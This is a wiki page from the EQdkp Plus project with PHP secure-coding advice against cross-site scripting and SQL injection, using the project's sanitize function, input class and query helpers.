• Navigation
  • Main page
  • Recent changes
  • Random page
  • Help
• Toolbox
  • What links here
  • Related changes
  • Upload file
  • Special pages
  • Printable version
  • Permanent link
  • Print as PDF

Security

From EQdkp Plus Wiki

Information
min. EQDKP-PLUS Version	0.6.2.8 or higher

Contents 1 Secure Coding 1.1 Why should the code be secured? 1.2 Prevent XSS 1.3 Prevent SQL Injection 1.4 Examples

Secure Coding

Why should the code be secured?

Today, many ppl are trying to deface web applications. because of that the coding must be as secure as possible.

Prevent XSS

You should never use unfiltered user inputs. Always use the sanitize function!

$tpl->assign_block_vars('test_row', array(
        'ROW_CLASS'  => $eqdkp->switch_row_class(),
        'ITEM'             => sanitize($row['wl_item']),
        'ZONE'            => sanitize($row['wl_zone']),
        'BOSS'             => sanitize($row['wl_boss']),
));

Prevent SQL Injection

• Always use the $in-> class of eqdkp. never trust the user inputs.

$sql = "DELETE FROM __members WHERE ( member_id = " . $in->get('id', 0) . " ) LIMIT 1";

The usage is pretty simple: All $_POST, $_SESSION, $_COOKIE, $_GET should be prevented, use $in->get instead.

$in->get(NAME, FALLBACK Value)

If your variable to fetch is a number/id, always use '0' as fallback value. Because of that the input is handled as integer, injects are prevented.

To handle arrays with the $in-> class

implode(',', $in->getArray('compare_ids', 'int'))

• Use db->escape() in all SQL Queries!

• Use the build in "make_query" function for adding stuff..

In this case the risk is minor because build_query() automatically makes all variables SQL-safe, but we should input filter them as well for extra measure:

$db->query("INSERT INTO __wishlist :params", array(
        'wl_id'     => null,
        'wl_member' => ucfirst($user->data['username']),
        'wl_item'   => $in->get('wishlist_item'),
        'wl_type'   => $in->get('wishlist_type'),
));

Examples

Here, settings.php forces the GET variable 'id' to be an integer:

$sql = "DELETE FROM " . WISHLIST_TABLE . "
        WHERE ( wl_id = " . intval($_GET['id']) . " )
        AND ( wl_member = '" . ucfirst($user->data['username']) . "' )
        LIMIT 1";

But we can have Input do this for us by passing it an integer as the second parameter, its default value if 'id' doesn't exist.

$sql = "DELETE FROM __wishlist
        WHERE ( wl_id = " . $in->get('id', 0) . " )
        AND ( wl_member = '" . ucfirst($user->data['username']) . "' )
        LIMIT 1";

See the documentation for Input in /includes/input.php for more details on what get() can do.

Kategorie:Basics